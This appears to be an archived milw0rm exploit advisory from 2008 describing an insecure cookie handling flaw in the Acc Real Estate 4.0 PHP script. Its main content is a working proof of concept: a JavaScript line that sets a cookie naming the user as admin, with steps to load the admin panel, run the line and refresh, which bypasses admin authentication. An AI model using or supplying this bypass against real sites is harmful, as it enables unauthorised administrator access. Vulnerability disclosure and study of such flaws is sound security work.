Acc Real Estate 4.0 - Insecure Cookie Handling



Author:

Hakxer

Type:

webapps


Platform:

PHP

Date:

2008-11-03


###########################################################################
      ______    __  __   ______          __                ______                   
     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
        /____/                                           

# [~] Discovered by : Hakxer
# [~] Type Gap : Acc Real Estate v4.0 Insecure Cookie Handling
# [~] Script : http://www.accscripts.com/realestate/admin-area-specifications.html
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
##########################################################################

Bug In : /admin/Index.php
   
   PoC : javascript:document.cookie="username_cookie=admin";
   
   [~] Admin panel 
   http://www.accscripts.com/realestate/demo/admin/index.php
   [~] Execute JS Code javascript:document.cookie="username_cookie=admin"; 
   [~] Refresh
		

#  Proud To be a Muslim #
#_=END=_#

# milw0rm.com [2008-11-03]